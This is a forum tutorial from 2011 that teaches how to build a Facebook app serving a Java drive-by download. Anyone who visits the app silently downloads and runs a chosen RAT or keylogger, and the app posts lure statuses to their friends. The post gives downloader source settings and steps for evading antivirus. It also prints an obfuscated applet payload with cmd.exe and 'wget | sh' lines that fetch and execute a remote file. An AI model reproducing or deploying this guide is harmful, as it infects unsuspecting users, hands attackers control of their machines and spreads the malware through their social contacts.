[Tutorial]Automatic Facebook Spreader / Downloader │ Drive By Download │ Detailed

**House** · 01-19-2011

Note: To everyone thats having problems, I will update the thread with a FAQ soon along with some new recommended hosts as facebook has started blocking some. Also I am aware some AV's are detecting the actual download (not the files themselves) and this will be update once I re-fud it.

New video example:

I have removed the support for firefox from the code, this code supports internet explorer on vista, xp and windows 7. I removed firefox so that only people who can actually code can have full functionality. This works perfect with anyone who uses IE.

Features:
[√]Supports Windows Xp, Vista & 7
[√]Supports Internet Explorer
[√]FUD
[√]Will only execute once, if you visit the link again it won't execute.
[√]Automatic spreading.
[√]If you get one person to click it, you automatically advertise to 500+.

I'm firstly going to explain what this program does and how it actually works, I recommend you read this entire tutorial before attempting to actually do it and definatly before asking any questions. This is at heart a java drive by download taking advantage of the ability use iframes on facebook. You upload your HTML and settings files to a host, compile your program and upload it and finally make a facebook app and your basically ready to go. When someone visits your application on facebook it will auto download and execute any file you want (could be a RAT etc) and then post a status on their facebook advertising your page. I made a tutorial before on facebook spreading and a drive by download but this has taken it many steps further.

Note: You need to follow these steps in order, don't think your some computer genius who can skip to the last step.

Step One - Getting A Host/Settings Files:
Your going to initially before you do anything get a host to upload your settings files to, these files won't be filled in yet or have any information in, it's simply so that we can get the link to them. I recommend using a different host for these settings files and your java and html files later on in the tutorial.

Web hosts for settings files:
FREE Website Hosting & Premium Web Hosting - 110mb.com
https://www.365-hosting.net/
Free Web Hosting with cPanel, PHP, and no Ads
Best Free Web Hosting and Webspace for Your Website by AwardSpace.com
1GB - Free Web Hosting and Space - get a free website!

I don't know which ones are best, there just from a quick google search, I personally use my own server so I wouldn't know. If one doesn't work well, change to another or google to find a better one.

Your going need to create and upload two text files to your host, text file one you need to call:
Text file two:

link.txt

You don't need to put anything in these files yet, simply upload them.

Step two - Editing and compiling the source:
I did not create a builder for this, due to me thinking if someone can't edit the source code and compile it they don't deserve to have it.

The program is coded in vb.NET, therefore, you will need visual studio to compile it. If you haven't got visual studio here is a link for the express version which is free:
Microsoft Express Downloads - Visual Studio Express and SQL Server Express

Simply follow that link, change the langauge to your langauge and download and install it. Once it is installed or if you already have it you will need to download the source code linked below, I'm not putting up a virus scan for it because it's source code, if you think theres a virus somehow hidden in the source code for a vb.NET application then you may asswell leave now.

Source code:

Once you have the source code, open up the project and get the code up. Theres a couple of things your going to have to change, find where it states:

Code:

Dim StatusOne As String = "https://url/status.txt" 'Link to file containing status
Dim Link As String = "https://url.com/link.txt" 'Link to file containing link
Dim Filename As String = "windows.exe" 'Filename to store the new file, don't change.

It's pretty straight forward what you put in there so I won't explain it, if your wondering why I didn't just put the links to malware etc in my program, by putting them in a file on a host I can change the satus and link without re-compiling the program etc.

Once you have your strings changed compile it up and your ready to go onto the next step, as I stated I'm not going to guide you through this bit in detail.

Once you have your program compiled, upload it to a host that allow's .exe's, it must be a direct link, do not use something like mega

upload.

Step Three - HTML & Java files:
Your now going to need a host for your html and java files, I recommend using a different host to your settings file but it's up to you. Download the index.html file and Java applet from below:

Open up the index.html in notepad or whatever you want to use and change this string to your url of the program we compiled in the last section (svchost32), there are two instances of this string:

CoolChaser - Express yourself! Your own MySpace layouts in minutes

Once you have changed both strings go onto:
https://www.iwebtool.com/html_encrypte

Input your entire html code into the top box, click encrypt and then copy and paste the code in the bottom box and replace your entire index.html with the new encrypted code, this is to stop certain AV's such as NOD32 from picking up on the HTML code.

Your code should look something like:

Code:

<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%3C%74%69%74%6C%65%3E%3C%  2F%74%69%74%6C%65%3E%0A%3C%73%74%79%6C%65%20%74%79  %70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%62%6  F%64%79%2C%74%64%2C%74%68%20%7B%0A%09%66%6F%6E%74%  2D%66%61%6D%69%6C%79%3A%20%54%61%68%6F%6D%61%2C%20  %47%65%6E%65%76%61%2C%20%73%61%6E%73%2D%73%65%72%6  9%66%3B%0A%09%66%6F%6E%74%2D%73%69%7A%65%3A%20%78%  2D%6C%61%72%67%65%3B%0A%7D%0A%3C%2F%73%74%79%6C%65  %3E%0A%3C%62%6F%64%79%3E%3C%62%72%3E%0A%3C%63%65%6  E%74%65%72%3E%0A%3C%61%70%70%6C%65%74%20%77%69%64%  74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27  %20%63%6F%64%65%3D%27%43%6C%69%65%6E%74%2E%63%6C%6  1%73%73%27%20%61%72%63%68%69%76%65%3D%27%43%6C%69%  65%6E%74%2E%6A%61%72%27%3E%0A%20%20%3C%70%61%72%61  %6D%20%6E%61%6D%65%3D%27%77%69%6E%64%6F%77%73%31%2  7%20%76%61%6C%75%65%3D%27%63%6D%64%2E%65%78%65%20%  2F%63%20%65%63%68%6F%20%43%6F%6E%73%74%20%61%64%54  %79%70%65%42%69%6E%61%72%79%20%3D%20%31%20%3E%20%2  5%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%  76%62%73%20%26%20%65%63%68%6F%20%43%6F%6E%73%74%20  %61%64%53%61%76%65%43%72%65%61%74%65%4F%76%65%72%5  7%72%69%74%65%20%3D%20%32%20%3E%3E%20%25%74%65%6D%  70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20  %26%20%65%63%68%6F%20%44%69%6D%20%53%20%3E%3E%20%2  5%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%  76%62%73%20%26%20%65%63%68%6F%20%44%69%6D%20%41%20  %3E%3E%20%25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%6  6%69%67%2E%76%62%73%20%26%20%65%63%68%6F%20%44%69%  6D%20%44%54%4E%44%54%4E%20%3E%3E%20%25%74%65%6D%70  %25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%2  6%20%65%63%68%6F%20%53%20%3D%20%22%41%44%4F%44%42%  22%20%3E%3E%20%25%74%65%6D%70%25%5C%77%69%6E%63%6F  %6E%66%69%67%2E%76%62%73%20%26%20%65%63%68%6F%20%4  1%20%3D%20%22%2E%53%74%72%65%61%6D%22%20%3E%3E%20%  25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E  %76%62%73%20%26%20%65%63%68%6F%20%53%65%74%20%44%5  4%4E%44%54%4E%20%3D%20%43%72%65%61%74%65%4F%62%6A%  65%63%74%28%53%2B%41%29%20%3E%3E%20%25%74%65%6D%70  %25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%2  6%20%65%63%68%6F%20%44%54%4E%44%54%4E%2E%54%79%70%  65%20%3D%20%61%64%54%79%70%65%42%69%6E%61%72%79%20  %3E%3E%20%25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%6  6%69%67%2E%76%62%73%20%26%20%65%63%68%6F%20%44%54%  4E%44%54%4E%2E%4F%70%65%6E%20%3E%3E%20%25%74%65%6D  %70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%2  0%26%20%65%63%68%6F%20%44%54%4E%44%54%4E%2E%57%72%  69%74%65%20%42%69%6E%61%72%79%47%65%74%55%52%4C%28  %57%73%63%72%69%70%74%2E%41%72%67%75%6D%65%6E%74%7  3%28%30%29%29%20%3E%3E%20%25%74%65%6D%70%25%5C%77%  69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%26%20%65%63  %68%6F%20%44%54%4E%44%54%4E%2E%53%61%76%65%54%6F%4  6%69%6C%65%20%57%73%63%72%69%70%74%2E%41%72%67%75%  6D%65%6E%74%73%28%31%29%2C%20%61%64%53%61%76%65%43  %72%65%61%74%65%4F%76%65%72%57%72%69%74%65%20%3E%3  E%20%25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%  67%2E%76%62%73%20%26%20%65%63%68%6F%20%46%75%6E%63  %74%69%6F%6E%20%42%69%6E%61%72%79%47%65%74%55%52%4  C%28%55%52%4C%29%20%3E%3E%20%25%74%65%6D%70%25%5C%  77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%26%20%65  %63%68%6F%20%44%69%6D%20%48%74%74%70%20%3E%3E%20%2  5%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%  76%62%73%20%26%20%65%63%68%6F%20%53%65%74%20%48%74  %74%70%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%7  4%28%22%57%69%6E%48%74%74%70%2E%57%69%6E%48%74%74%  70%52%65%71%75%65%73%74%2E%35%2E%31%22%29%20%3E%3E  %20%25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%6  7%2E%76%62%73%20%26%20%65%63%68%6F%20%48%74%74%70%  2E%4F%70%65%6E%20%22%47%45%54%22%2C%20%55%52%4C%2C  %20%46%61%6C%73%65%20%3E%3E%20%25%74%65%6D%70%25%5  C%77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%26%20%  65%63%68%6F%20%48%74%74%70%2E%53%65%6E%64%20%3E%3E  %20%25%74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%6  7%2E%76%62%73%20%26%20%65%63%68%6F%20%42%69%6E%61%  72%79%47%65%74%55%52%4C%20%3D%20%48%74%74%70%2E%52  %65%73%70%6F%6E%73%65%42%6F%64%79%20%3E%3E%20%25%7  4%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76%  62%73%20%26%20%65%63%68%6F%20%45%6E%64%20%46%75%6E  %63%74%69%6F%6E%20%3E%3E%20%25%74%65%6D%70%25%5C%7  7%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%26%20%65%  63%68%6F%20%53%65%74%20%73%68%65%6C%6C%20%3D%20%43  %72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%53%63%7  2%69%70%74%2E%53%68%65%6C%6C%22%29%20%3E%3E%20%25%  74%65%6D%70%25%5C%77%69%6E%63%6F%6E%66%69%67%2E%76  %62%73%20%26%20%65%63%68%6F%20%73%68%65%6C%6C%2E%5  2%75%6E%20%22%25%74%65%6D%70%25%5C%75%70%64%61%74%  65%2E%65%78%65%22%20%3E%3E%20%25%74%65%6D%70%25%5C  %77%69%6E%63%6F%6E%66%69%67%2E%76%62%73%20%26%20%7  3%74%61%72%74%20%25%74%65%6D%70%25%5C%77%69%6E%63%  6F%6E%66%69%67%2E%76%62%73%20%20%68%74%74%70%3A%2F  %2F%75%72%6C%2E%63%6F%6D%2F%66%69%6C%65%2E%65%78%6  5%20%25%74%65%6D%70%25%5C%75%70%64%61%74%65%2E%65%  78%65%27%3E%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%3D  %27%77%69%6E%64%6F%77%73%32%27%20%76%61%6C%75%65%3  D%27%27%3E%0A%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%  3D%27%75%6E%69%78%31%27%20%76%61%6C%75%65%3D%22%22  %3E%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%27%75%6  E%69%78%32%27%20%76%61%6C%75%65%3D%22%22%3E%0A%0A%  3C%70%61%72%61%6D%20%6E%61%6D%65%3D%27%6C%69%6E%75  %78%31%27%20%76%61%6C%75%65%3D%22%77%67%65%74%20%2  0%68%74%74%70%3A%2F%2F%75%72%6C%2E%63%6F%6D%2F%66%  69%6C%65%2E%65%78%65%20%2D%4F%2D%20%7C%20%73%68%22  %3E%0A%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%27%6C%6  9%6E%75%78%32%27%20%76%61%6C%75%65%3D%22%22%3E%0A%  0A%3C%2F%61%70%70%6C%65%74%3E%0A%3C%63%65%6E%74%65  %72%3E%0A%50%6C%65%61%73%65%20%61%6C%6C%6F%77%20%7  4%68%65%20%4A%61%76%61%20%61%70%70%6C%69%63%61%74%  69%6F%6E%20%74%6F%20%73%65%65%20%74%68%69%73%20%70  %61%67%65%2E%0A%3C%2F%63%65%6E%74%65%72%3E%0A%3C%2  F%62%6F%64%79%3E'));
//-->
</Script>

After that save and upload both your index.html and the java client.jar.

Step Four - Creating a facebook application:
Click this link to go to the create app page - Login | Facebook

Now fill in the name you want for your application.

Click next, then click 'facebook integration'.

On this page the only thing you need to fill in is the 'Canvas Page' and the 'Canvas URL' the canvas page is the name of your page that were going to put in the status and the canvas URL is the link to the index.html file we just uploaded.

Then click save.

Step Five - Editing Our Settings:
This is where you will need to upload your malicous file such as a RAT or keylogger to a host, when you've uploaded it you need to edit the 'link.txt' we made at the very start of the tutorial in the file simply enter the direct link to your malicious file, make sure there is nothing else in the file, including no spaces at the end. Save and re-upload.

Finally were going to edit what we want posted onto people's status's. Open the 'status.txt' file and input what you want to be posted I recommend putting something enticing and obvioulsy a link to your facebook page, there is a character limit but I can't remember what it is.

Once both have been uploaded your ready to spread.

If you're wondering why some bits 'cut off' it's due to me running out of characters and having to shorten it haha.

Credits to Endax for the tut

Java.rar contains some false positives

VirusTotal - Free Online Virus, Malware and URL Scanner

VirusTotal - Free Online Virus, Malware and URL Scanner